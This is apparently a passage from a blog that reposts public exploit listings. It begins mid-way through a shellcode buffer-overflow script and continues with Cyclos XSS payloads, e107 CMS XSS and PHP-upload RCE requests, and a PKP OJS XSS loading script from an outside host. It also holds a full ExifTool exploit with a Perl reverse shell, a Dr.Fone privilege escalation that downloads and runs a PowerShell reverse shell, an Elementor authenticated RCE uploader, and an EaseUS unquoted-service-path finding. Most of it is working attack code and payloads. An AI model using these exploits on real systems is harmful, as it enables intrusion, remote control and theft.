b"\x98\xc7\x10\xc9\x1e\x38\x67\x23\x5d\xc5\x70\xf0" payload += b"\x1c\x11\xf4\xe3\x86\xd2\xae\xcf\x37\x36\x28\x9b" payload += b"\x3b\xf3\x3e\xc3\x5f\x02\x92\x7f\x5b\x8f\x15\x50" payload += b"\xea\xcb\x31\x74\xb7\x88\x58\x2d\x1d\x7e\x64\x2d" payload += b"\xfe\xdf\xc0\x25\x12\x0b\x79\x64\x78\xca\x0f\x12" payload += b"\xce\xcc\x0f\x1d\x7e\xa5\x3e\x96\x11\xb2\xbe\x7d" payload += b"\x56\x4c\xf5\xdc\xfe\xc5\x50\xb5\x43\x88\x62\x63" payload += b"\x87\xb5\xe0\x86\x77\x42\xf8\xe2\x72\x0e\xbe\x1f" payload += b"\x0e\x1f\x2b\x20\xbd\x20\x7e\x43\x20\xb3\xe2\xaa" payload += b"\xc7\x33\x80\xb2" evil = buffer + jum + nop + payload file = open('PExploit.txt','w+') file.write(evil) file.close()
  18. HireHackking

    Cyclos 4.14.7 - 'groupId' DOM Based Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Cyclos 4.14.7 - 'groupId' DOM Based Cross-Site Scripting (XSS) # Date: 17/04/2021 # Exploit Author: Tin Pham aka TF1T of VietSunshine Cyber Security Services # Vendor Homepage: https://www.cyclos.org/ # Version: Cyclos 4.14.7 (and prior) # Tested on: Ubuntu # CVE : CVE-2021-31673 # Description: A Dom-based Cross-site scripting (XSS) vulnerability at registration account in Cyclos 4 PRO.14.7 and prior allows remote attackers to inject arbitrary web script or HTML via the 'groupId' parameter. # Steps to reproduce: An attacker sends a draft URL [IP]/#users.users.public-registration!groupId=1%27%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E to victim. When a victim opens the URL, XSS will be triggered.
  19. HireHackking

    Cyclos 4.14.7 - DOM Based Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Cyclos 4.14.7 - DOM Based Cross-Site Scripting (XSS) # Date: 18/04/2021 # Exploit Author: Tin Pham aka TF1T of VietSunshine Cyber Security Services # Vendor Homepage: https://www.cyclos.org/ # Version: Cyclos 4.14.7 (and prior) # Tested on: Ubuntu # CVE : CVE-2021-31674 # Description: Cyclos 4 PRO 4.14.7 and before does not validate user input at error inform, which allows remote unauthenticated attacker to execute javascript code via undefined enum. # Steps to reproduce: An attacker sends a draft URL [IP]/#users.users.public-registrationxx%3Cimg%20src=x%20onerror=%22[]['\146\151\154\164\145\162']['\143\157\156\163\164\162\165\143\164\157\162']('\162\145\164\165\162\156\40\164\150\151\163')()['\141\154\145\162\164'](1)%22%3E to victim. When a victim opens the URL, XSS will be triggered.
  20. HireHackking

    ExifTool 12.23 - Arbitrary Code Execution

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: ExifTool 12.23 - Arbitrary Code Execution # Date: 04/30/2022 # Exploit Author: UNICORD (NicPWNs & Dev-Yeoj) # Vendor Homepage: https://exiftool.org/ # Software Link: https://github.com/exiftool/exiftool/archive/refs/tags/12.23.zip # Version: 7.44-12.23 # Tested on: ExifTool 12.23 (Debian) # CVE: CVE-2021-22204 # Source: https://github.com/UNICORDev/exploit-CVE-2021-22204 # Description: Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image #!/usr/bin/env python3 # Imports import base64 import os import subprocess import sys # Class for colors class color: red = '\033[91m' gold = '\033[93m' blue = '\033[36m' green = '\033[92m' no = '\033[0m' # Print UNICORD ASCII Art def UNICORD_ASCII(): print(rf""" {color.red} _ __,~~~{color.gold}/{color.red}_{color.no} {color.blue}__ ___ _______________ ___ ___{color.no} {color.red} ,~~`( )_( )-\| {color.blue}/ / / / |/ / _/ ___/ __ \/ _ \/ _ \{color.no} {color.red} |/| `--. {color.blue}/ /_/ / // // /__/ /_/ / , _/ // /{color.no} {color.green}_V__v___{color.red}!{color.green}_{color.red}!{color.green}__{color.red}!{color.green}_____V____{color.blue}\____/_/|_/___/\___/\____/_/|_/____/{color.green}....{color.no} """) # Print exploit help menu def help(): print(r"""UNICORD Exploit for CVE-2021-22204 Usage: python3 exploit-CVE-2021-22204.py -c <command> python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port> python3 exploit-CVE-2021-22204.py -c <command> [-i <image.jpg>] python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port> [-i <image.jpg>] python3 exploit-CVE-2021-22204.py -h Options: -c Custom command mode. Provide command to execute. -s Reverse shell mode. Provide local IP and port. -i Path to custom JPEG image. (Optional) -h Show this help menu. """) # Run the exploit def exploit(command): UNICORD_ASCII() # Create perl payload payload = "(metadata \"\c${" payload += command payload += "};\")" print(f"{color.red}RUNNING: {color.blue}UNICORD Exploit for CVE-2021-22204{color.no}") print(f"{color.red}PAYLOAD: {color.gold}" + payload + f"{color.no}") # Write payload to file payloadFile = open('payload','w') payloadFile.write(payload) payloadFile.close() # Bzz compress file subprocess.run(['bzz', 'payload', 'payload.bzz']) # Run djvumake subprocess.run(['djvumake', 'exploit.djvu', "INFO=1,1", 'BGjp=/dev/null', 'ANTz=payload.bzz']) if '-i' in sys.argv: imagePath = sys.argv[sys.argv.index('-i') + 1] subprocess.run(['cp',f'{imagePath}','./image.jpg','-n']) else: # Smallest possible JPEG image = b"/9j/4AAQSkZJRgABAQEASABIAAD/2wBDAAMCAgICAgMCAgIDAwMDBAYEBAQEBAgGBgUGCQgKCgkICQkKDA8MCgsOCwkJDRENDg8QEBEQCgwSExIQEw8QEBD/yQALCAABAAEBAREA/8wABgAQEAX/2gAIAQEAAD8A0s8g/9k=" # Write smallest possible JPEG image to file with open("image.jpg", "wb") as img: img.write(base64.decodebytes(image)) # Write exiftool config to file config = (r""" %Image::ExifTool::UserDefined = ( 'Image::ExifTool::Exif::Main' => { 0xc51b => { Name => 'HasselbladExif', Writable => 'string', WriteGroup => 'IFD0', }, }, ); 1; #end """) configFile = open('exiftool.config','w') configFile.write(config) configFile.close() # Exiftool config for output image subprocess.run(['exiftool','-config','exiftool.config','-HasselbladExif<=exploit.djvu','image.jpg','-overwrite_original_in_place','-q']) # Delete leftover files os.remove("payload") os.remove("payload.bzz") os.remove("exploit.djvu") os.remove("exiftool.config") # Print results print(f"{color.red}RUNTIME: {color.green}DONE - Exploit image written to 'image.jpg'{color.no}\n") exit() if __name__ == "__main__": args = ['-h','-c','-s','-i'] if args[0] in sys.argv: help() elif args[1] in sys.argv and not args[2] in sys.argv: exec = sys.argv[sys.argv.index(args[1]) + 1] command = f"system(\'{exec}\')" exploit(command) elif args[2] in sys.argv and not args[1] in sys.argv: localIP = sys.argv[sys.argv.index(args[2]) + 1] localPort = sys.argv[sys.argv.index(args[2]) + 2] command = f"use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in({localPort},inet_aton('{localIP}')))){{open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');}};" exploit(command) else: help()
  21. HireHackking

    e107 CMS v3.2.1 - Multiple Vulnerabilities

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: e107 CMS v3.2.1 - Multiple Vulnerabilities # Date: 30/04/2022 # Exploit Author: Hubert Wojciechowski # Contact Author: snup.php@gmail.com # Vendor Homepage: https://e107.org/ # Software Link: https://e107.org/download # Version: 3.2.1 # Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 ### XSS Reflected - Via adding comment (Authenticated) # POC Request: GET /e107/news.php/fnzi4'onchange='alert(1)'?extend.1 HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close Cookie: e107_tzOffset=-60; PHPSESSID=2ju9huul2lsl7565jpre0f2g40 Response: HTTP/1.1 200 OK Date: Tue, 14 Dec 2021 08:02:42 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11 X-Powered-By: e107 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache ETag: "71d7966eaa95fd8ac14da8baf3e0785d" Content-Length: 25059 Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN Connection: close Content-Type: text/html; charset=utf-8 [...] <div class='media' > <form id='e-comment-form' method='post' action='/e107/news.php/fnzi4'onchange='alert(1)'?extend.1' > [...] User click to comment in news, writes any character in the comment field, and clicks elsewhere outside the comment field image.png ### Upload restriction bypass (Authenticated [Admin]) + Stored Xss. Account with administrative privileges can bypass upload image restriction (XSS Stored from .svg file) image->media manager->upload a file->Image/File URL admin can upload SVG from localhost ->http://127.0.0.1:8070/xxe_svg2.svg # POC Request: POST /e107/e107_admin/image.php?mode=main&action=dialog&for=page^&tagid=&iframe=1&bbcode=img HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 90 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=dialog&for=page^&tagid=&iframe=1&bbcode=img Cookie: e107_tzOffset=-60; PHPSESSID=t656bpkef7ndqm0p8j9ddf9atl Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: iframe Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fxxe_svg2.svg&upload_remote_url=1&upload_caption= Response: HTTP/1.1 200 OK Date: Tue, 14 Dec 2021 02:06:14 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11 X-Powered-By: e107 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache ETag: "06ed5ef56b0f736995112cafd77e9ec0" Content-Length: 20878 Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN Connection: close Content-Type: text/html; charset=utf-8 <!doctype html> <html lang="en"> <head> <title>Media Manager - Admin Area :: trrrrrrrrrrrrrrrr [...] <div class='well clearfix media-carousel-item-container'> <a data-toggle='context' data-bs-toggle='context' class='e-media-select ' data-id='' data-width='0' data-height='0' data-src='/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg' data-type='image' data-bbcode='img' data-target='' data-path='{e_MEDIA_IMAGE}2021-12/xxe_svg2.svg' data-preview='/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg' data-preview-html='PGltZyBjbGFzcz0iaW1nLXJlc3BvbnNpdmUgaW1nLWZsdWlkIiBzcmM9Ii9lMTA3L2UxMDdfbWVkaWEvNDE2ZjQ2MDJlMy9pbWFnZXMvMjAyMS0xMi94eGVfc3ZnLnN2ZyIgYWx0PSJ4eGVfc3ZnLnN2ZyIgc3Jjc2V0PSIvZTEwNy9lMTA3X21lZGlhLzQxNmY0NjAyZTMvaW1hZ2VzLzIwMjEtMTIveHhlX3N2Zy5zdmcgMngiIHdpZHRoPSIyMTAiIGhlaWdodD0iMTQwIiAgLz4=' title="xxe_svg2.svg ()" style='' href='#' ><span><img class="img-responsive img-fluid" alt="" src="/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg" style="display:inline-block" /></span> </a> [...] image.png ### Upload restriction bypass (Authenticated [Admin])+RCE Upload and execute .PHP file Attacker must upload file to ../../../ to parent directory, due to fact that somehow application user can only execute PHP code when uploading to parent directory. image.png Media Manager-> Media Upload/Import -> From a remote location # POC Request POST /e107/e107_admin/image.php?mode=main&action=import HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 109 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=import Cookie: e107_tzOffset=-60; PHPSESSID=9ngnt3lteu7133g74qb9nu3jtu Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fcmd2.php&upload_remote_url=1&upload_caption=..%2F..%2F..%2Fcmd.php Response: HTTP/1.1 200 OK Date: Tue, 14 Dec 2021 09:02:08 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11 X-Powered-By: e107 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache ETag: "5b9621fc78893e36034b14f841f840f8" Content-Length: 26075 Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN Connection: close Content-Type: text/html; charset=utf-8 <!doctype html> <html lang="en"> <head> <title>Media Manager - Admin Area :: trrrrrrrrrrrrrrrr [...] We can see uploaded PHP file on the server side. image.png cmd.php file source: <?php system('whoami'); ?> image.png ### Upload restriction bypass (Authenticated [Admin])+ Server file override Attacker can override example top.php file in the main directory of web application. Original file top.php in server: image.png We can override file via following upload functionality: Media Manager-> Media Upload/Import -> From a remote location # POC Request: POST /e107/e107_admin/image.php?mode=main&action=import HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: pl,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 109 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=import Cookie: e107_tzOffset=-60; PHPSESSID=9ngnt3lteu7133g74qb9nu3jtu Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fcmd2.php&upload_remote_url=1&upload_caption=..%2F..%2F..%2Ftop.php Response: HTTP/1.1 200 OK Date: Tue, 14 Dec 2021 09:20:10 GMT Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11 X-Powered-By: e107 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache ETag: "5b9621fc78893e36034b14f841f840f8" Content-Length: 26075 Vary: Accept-Encoding X-Frame-Options: SAMEORIGIN Connection: close Content-Type: text/html; charset=utf-8 [...] top.php file content was tampered:
  22. HireHackking

    PKP Open Journals System 3.3 - Cross-Site Scripting (XSS)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: PKP Open Journals System 3.3 - Cross-Site Scripting (XSS) # Date: 31/01/2022 # Exploit Author: Hemant Kashyap # Vendor Homepage: https://github.com/pkp/pkp-lib/issues/7649 # Version: PKP Open Journals System 2.4.8 >= 3.3 # Tested on: All OS # CVE : CVE-2022-24181 # References: https://youtu.be/v8-9evO2oVg XSS via Host Header injection and Steal Password Reset Token of another user Step to reproduce: 1) Go to this site: https://who's-using-ojs-software.com 2) And capture this request in burp , and send to repeater. 3) Add this after Host Header X-Forwarded-Host: foo"><script src=//dtf.pw/2.js></script><x=".com 4) And this click on send , after this right click on request and click on show response in browser , after this copy the request. 5) Paste this request in browser , and you'll see xss pop-up. Mitigation: Update to newer version. This vulnerability in PKP vendor software Open-journal-system version 2.4.8 to 3.3.8 all are vulnerable to xss via Host Header injection and steal password reset token vulnerability
  23. HireHackking

    Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Wondershare Dr.Fone 12.0.7 - Privilege Escalation (ElevationService) # Date: 4/27/2022 # Exploit Author: Netanel Cohen & Tomer Peled # Vendor Homepage: https://drfone.wondershare.net/ # Software Link: https://download.wondershare.net/drfone_full4008.exe # Version: up to 12.0.7 # Tested on: Windows 10 # CVE : 2021-44595 # References: https://github.com/netanelc305/WonderShell #Wondershare Dr. Fone Latest version as of 2021-12-06 is vulnerable to Incorrect Access Control. A normal user can send manually crafted packets to the ElevationService.exe and #execute arbitrary code without any validation with SYSTEM privileges. #!/bin/python3 import msgpackrpc LADDR = "192.168.14.129" LPORT = 1338 RADDR = "192.168.14.137" RPORT = 12345 param = f"IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell {LADDR} {int(LPORT)}" client = msgpackrpc.Client(msgpackrpc.Address(RADDR, 12345)) result = client.call('system_s','powershell',param) # stty raw -echo; (stty size; cat) | nc -lvnp 1338
  24. HireHackking

    WordPress Plugin Elementor 3.6.2 - Remote Code Execution (RCE) (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: WordPress Plugin Elementor 3.6.2 - Remote Code Execution (RCE) (Authenticated) # Date: 04/16/2022 # Exploit Author: AkuCyberSec (https://github.com/AkuCyberSec) # Vendor Homepage: https://elementor.com/ # Software Link: https://wordpress.org/plugins/elementor/advanced/ (scroll down to select the version) # Version: 3.6.0, 3.6.1, 3.62 # Tested on: WordPress 5.9.3 (os-independent since this exploit does NOT provide the payload) #!/usr/bin/python import requests import re # WARNING: This exploit does NOT include the payload. # Also, be sure you already have some valid credentials. This exploit needs an account in order to work. # # # # # VULNERABILITY DESCRIPTION # # # # # # The WordPress plugin called Elementor (v. 3.6.0, 3.6.1, 3.6.2) has a vulnerability that allows any authenticated user to upload and execute any PHP file. # This vulnerability, in the OWASP TOP 10 2021, is placed in position #1 (Broken Access Control) # The file that contains this vulnerability is elementor/core/app/modules/onboarding/module.php # # At the end of this file you can find this code: # add_action( 'admin_init', function() { # if ( wp_doing_ajax() && # isset( $_POST['action'] ) && # isset( $_POST['_nonce'] ) && # wp_verify_nonce( $_POST['_nonce'], Ajax::NONCE_KEY ) # ) { # $this->maybe_handle_ajax(); # } # } ); # # This code is triggered whenever ANY user account visits /wp-admin # In order to work we need the following 4 things: # 1. The call must be an "ajax call" (wp_doing_ajax()) and the method must be POST. In order to do this, we only need to call /wp-admin/admin-ajax.php # 2. The parameter "action" must be "elementor_upload_and_install_pro" (check out the function named maybe_handle_ajax() in the same file) # 3. The parameter "_nonce" must be retrieved after login by inspecting the /wp-admin page (this exploit does this in DoLogin function) # 4. The parameter "fileToUpload" must contain the ZIP archive we want to upload (check out the function named upload_and_install_pro() in the same file) # # The file we upload must have the following structure: # 1. It must be a ZIP file. You can name it as you want. # 2. It must contain a folder called "elementor-pro" # 3. This folder must contain a file named "elementor-pro.php"# This file will be YOUR payload (e.g. PHP Reverse Shell or anything else) # 4. The payload must contain AT LEAST the plugin name, otherwise WordPress will NOT accept it and the upload will FAIL # e.g. # <?php # /** # * Plugin Name: Elementor Pro # */ # // Actual PHP payload # ?> # This file will be YOUR payload (e.g. PHP Reverse Shell or anything else) # # WARNING: The fake plugin we upload will be activated by Elementor, this means that each time we visit any page we trigger our payload. # If it tries, for example, to connect to an offline host, it could lead to a Denial of Service. # In order to prevent this, I suggest you to use some variable to activate the payload. # Something like this (visit anypage.php?activate=1 in order to continue with the actual payload): # if (!isset($_GET['activate'])) # return; # Change the following 4 variables: payloadFileName = 'elementor-pro.zip' # Change this with the path of the ZIP archive that contains your payload baseUrl = 'http://192.168.56.103/wordpress/' # Change this with the base url of the target username = 'guest' # Change this with the username you want to use to log in password = 'test' # Change this with the password you want to use to log in # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # session = requests.Session() cookies = { 'wordpress_test_cookie' : 'WP+Cookie+check' } # WordPress needs this to tell if browser can manage cookies def DoLogin(username, password): global cookies loginUrl = baseUrl + 'wp-login.php' adminUrl = baseUrl + 'wp-admin/' data = { 'log' : username, 'pwd' : password, 'wp-submit' : 'Login', 'redirect_to' : adminUrl, 'testcookie' : 1 } # search for: "ajax":{"url":"http:\/\/baseUrl\/wp-admin\/admin-ajax.php","nonce":"4e8878bdba"} # 4e8878bdba is just an example of nonce. It can be anything else. regexp = re.compile('"ajax":\\{"url":".+admin\\-ajax\\.php","nonce":"(.+)"\\}') response = session.post(loginUrl, cookies=cookies, data=data) search = regexp.search(response.text) if not search: # I've tested this on WordPress v. 5.9.3 # Fix the regexp if needed. print('Error - Invalid credentials?') #print(response.text) else: return search.group(1) def UploadFile(fileName, nonce): uploadUrl = baseUrl + 'wp-admin/admin-ajax.php' data = { 'action' : 'elementor_upload_and_install_pro', '_nonce' : nonce } files = { 'fileToUpload' : open(fileName, 'rb') } regexp = re.compile('"elementorProInstalled":true') # search for: "elementorProInstalled":true response = session.post(uploadUrl, data=data, files=files) search = regexp.search(response.text) if not search: # If Elemento Pro is already installed, the upload will fail. # You can print the response to investigate further print ('Error - Upload failed') # print (response.text) return False else: print ('Upload completed successfully!') return True # Define YOUR method to activate your payload (if needed) def ActivatePayload(): payloadUrl = baseUrl + 'index.php?activate=1' session.get(payloadUrl) print('Trying to login...') nonce = DoLogin(username, password) print('Nonce found: ' + nonce) print('Uploading payload...') fileUploaded = UploadFile(payloadFileName, nonce) # Define YOUR method to activate your payload (if needed) if fileUploaded: print ('Activating payload...') ActivatePayload()
  25. HireHackking

    EaseUS Data Recovery - 'ensserver.exe' Unquoted Service Path

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: EaseUS Data Recovery - 'ensserver.exe' Unquoted Service Path # Discovery by: bios # Discovery Date: 2022-18-04 # Vendor Homepage: https://www.easeus.com/ # Tested Version: 15.1.0.0 # Vulnerability Type: Unquoted Service Path # Tested on OS: Microsoft Windows 10 Pro x64 # Step to discover Unquoted Service Path: C:\>wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """ EaseUS UPDATE SERVICE EaseUS UPDATE SERVICE C:\Program Files (x86)\EaseUS\ENS\ensserver.exe Auto C:\>sc qc "EaseUS UPDATE SERVICE" [SC] QueryServiceConfig SUCCESS SERVICE_NAME: EaseUS UPDATE SERVICE TYPE : 10 WIN32_OWN_PROCESS START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Program Files (x86)\EaseUS\ENS\ensserver.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : EaseUS UPDATE SERVICE DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\>systeminfo Host Name: DESKTOP-HR3T34O OS Name: Microsoft Windows 10 Home OS Version: 10.0.19042 N/A Build 19042